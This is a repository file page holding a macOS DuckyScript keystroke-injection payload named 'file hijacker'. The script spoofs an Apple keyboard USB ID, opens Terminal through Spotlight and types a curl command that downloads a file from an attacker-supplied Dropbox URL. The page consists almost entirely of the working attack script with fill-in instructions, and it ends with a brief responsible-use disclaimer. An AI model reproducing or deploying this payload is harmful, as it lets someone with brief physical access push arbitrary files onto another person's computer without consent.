Files
MacOS-DuckyScripts/RECON/File hijacker.txt
T
2023-05-29 11:17:27 -05:00

22 lines
571 B
Plaintext

REM Author: Narsty
REM Title: file hijacker
REM Version 1.0 MacOs
REM Replace <Enter dropbox File URL here> with the actual URL for the file you want to download.
REM Additionally, replace file.ext with the desired name and extension for the downloaded file.
ID 05ac:021e Apple:Keyboard
DELAY 2000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 2000
STRING curl -o "file.ext" "Enter dropbox File URL here"
ENTER
REM It's crucial to use scripting and automation tools responsibly, following legal and ethical guidelines, and only for legitimate purposes.